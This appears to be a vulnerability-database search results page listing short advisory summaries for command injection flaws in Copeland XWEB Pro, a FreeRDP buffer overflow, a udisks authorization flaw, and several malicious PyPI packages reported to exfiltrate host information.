7921 matches found
CVE-2026-25037
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by configuring a maliciously crafted LCD state which is later processed during system setup, enabling remote code execution...
CVE-2026-25037 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by configuring a maliciously crafted LCD state which is later processed during system setup, enabling remote code execution...
CVE-2026-20764
CVE-2026-20764 affects Copeland XWEB Pro (versions prior to 1.12.1). An authenticated user can supply malicious input through the device hostname configuration, which is processed during system setup, resulting in OS command injection and remote code execution. Red Hat security notes the same vul...
CVE-2026-20764 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by providing malicious input via the device hostname configuration which is later processed during system setup, resulting in remote...
CVE-2026-20764 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by providing malicious input via the device hostname configuration which is later processed during system setup, resulting in remote...
CVE-2026-25109 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the devices field when accessing the get setup route...
CVE-2026-25109
CVE-2026-25109 affects XWEB Pro prior to 1.12.1. The vulnerability is an OS command injection in the devices field on the /get setup route, exploitable by an authenticated attacker to achieve remote code execution. Public sources (NVD, Red Hat, EUVD) confirm the impact and vulnerable version rang...
CVE-2026-25109
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the devices field when accessing the get setup route...
CVE-2026-25109 Copeland XWEB and XWEB Pro OS Command Injection
An OS command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the devices field when accessing the get setup route...
PT-2026-22260
Name of the Vulnerable Software and Affected Versions XWEB Pro versions prior to 1.12.1 Description A flaw exists that allows a logged-in attacker to execute code remotely on a system. This is possible by injecting malicious input into the devices field when accessing the /get setup API endpoint...
PT-2026-22279
Name of the Vulnerable Software and Affected Versions XWEB Pro versions 1.12.1 and earlier Description A flaw exists that allows a logged-in attacker to execute code on a system remotely. This is achieved by altering harmful input within the URL of the MBird SMS service and/or code through the...
PT-2026-22275
Name of the Vulnerable Software and Affected Versions XWEB Pro versions prior to 1.12.1 Description A flaw exists that allows a logged-in attacker to execute code on the system remotely. This is achieved by configuring a specially crafted LCD state, which is then processed during system setup. Th...
PT-2026-22270
Name of the Vulnerable Software and Affected Versions XWEB Pro versions prior to 1.12.1 Description An OS command injection issue exists, allowing an authenticated attacker to execute code remotely. This is achieved by providing malicious input through the device hostname configuration during...
Malicious code in edx-salesforce (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 c4ffac16b09d8312b28d4f65cd3d0f49ecccca9de9d7bbdac0aed694b28949b7 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in awareness-demo-pkg (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 73d2724a4dc0c9e8d1439a29324b142a46c456e7d078ba90127777a59bf906d8 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-1035 Malicious code in neural-compressor-jax (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 bb1f58a45ef1a06954d1807517faea8790a771906e95a98d571587558244ea3f Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
MAL-2026-1029 Malicious code in geocommunes-geoportal (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 818beaf9a2c40fe1d288ab5f872c124eb851c191110b30d222a884e0cbec50b5 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
freerdp: FreeRDP heap-buffer-overflow
A heap based buffer overflow has been discovered in FreeRDP. In affected versions the URBDRC client does not perform bounds checking on server‑supplied MSUSBINTERFACEDESCRIPTOR values and uses them as indices in libusbudevcompletemsconfigsetup, causing an out‑of‑bounds read...
DEBIAN-CVE-2026-26103
A flaw was found in the udisks storage management daemon that exposes a privileged D-Bus API for restoring LUKS encryption headers without proper authorization checks. The issue allows a local unprivileged user to instruct the root-owned udisks daemon to overwrite encryption metadata on block...
Malicious code in spark-audit-notify (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 1c527925d1e7cb4055b6c154326cd54a713ad543349c2b3b6f8ab8f0d75e8cbe During installation, host identification details including AD domain are exfiltrated through a series of functions obfuscating this behavior. --- Category:...